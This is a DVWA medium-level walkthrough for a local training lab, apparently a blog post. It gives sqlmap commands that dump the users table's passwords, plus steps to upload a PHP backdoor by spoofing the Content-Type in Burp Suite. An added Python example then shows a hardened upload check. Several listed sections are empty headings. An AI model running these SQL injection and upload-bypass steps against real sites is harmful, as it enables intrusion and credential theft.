Saturday, October 13, 2012

DVWA Level Medium


Before starting, open a console and start apache2:
#/etc/init.d/apache2 start
Open Burp Suite and Mantra.
Type localhost/dvwa in Mantra's address bar.
Log in > username : admin || password : password
Set DVWA security to the medium level and submit.
OK, now it's time to go on the offensive :)

1. Brute Force
2. Command Execution
3. CSRF
4. File Inclusion
5. SQL Injection

Type 1 in the form and submit, then go to Burp Suite to get the cookie.
Open a console:
#cd /pentest/database/sqlmap
#./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=gratsfgdu78cop0t16vq7iu224" --dbs

available databases [6]:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10
[*] performance_schema
[*] test

Get the tables of the dvwa database:
#./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=gratsfgdu78cop0t16vq7iu224" -D dvwa --tables

Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Get the passwords from the users table:
#./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=gratsfgdu78cop0t16vq7iu224" -T users --dump



6. Blind SQL Injection

The method/commands are the same as for SQL Injection; only the URL is different.



7. Upload
Browse to your image and upload it.
Next, look at the content type in Burp Suite ( content-type : image/jpeg ).
Besides that, you can upload other files, for example php-backdoor.php. Note that when you upload the file you must change the content-type in Burp Suite so that the file is accepted. Follow the upload of the other file step by step:


When uploading, the content-type is still application/x-httpd-php.



Change it to image/jpeg.


The next step is to forward the request. Look at this:

Copy /hackable/uploads/php-backdoors.php into the address bar after localhost/dvwa:
#localhost/dvwa/hackable/uploads/php-backdoors.php
Press Enter.
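
Why the edited header was enough, and what a server-side check that ignores it looks like. This is an added example, not DVWA's code and not from the original post: naive_check is an assumed model of a filter that trusts the Content-Type header, and all function names and sample uploads are constructed.

```python
import os
import secrets

# Allowlisted extensions mapped to the magic bytes the body must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}

# Constructed sample uploads (not captured traffic): (filename, declared type, body).
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP = b"<?php /* placeholder body */ ?>"
SAMPLES = [
    ("photo.jpg", "image/jpeg", JPEG),
    ("php-backdoor.php", "image/jpeg", PHP),  # header edited in the proxy, as in the post
    ("photo.jpg.php", "image/jpeg", JPEG),    # image bytes behind a script extension
]


def naive_check(filename, declared_type, body):
    """Assumed model of the bypassed filter: trusts the client-supplied header."""
    return declared_type == "image/jpeg"


def hardened_check(filename, declared_type, body):
    """Return (accepted, stored_name_or_reason). declared_type is ignored on purpose."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base:
        return False, "NUL byte in filename"
    ext = os.path.splitext(base)[1].lower()  # only the final extension counts
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not body.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    # Store under a server-chosen name so the client never controls the path.
    return True, secrets.token_hex(16) + ext


def evaluate():
    """Run both checks over SAMPLES: (filename, naive result, hardened result)."""
    return [(name, naive_check(name, ctype, body), hardened_check(name, ctype, body)[0])
            for name, ctype, body in SAMPLES]


if __name__ == "__main__":
    for row in evaluate():
        print(row)
```

A magic-byte check can still be satisfied by a polyglot file, so the extension allowlist and an upload directory in which the web server does not execute scripts remain the controls that matter most.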





8. XSS Stored
9. XSS
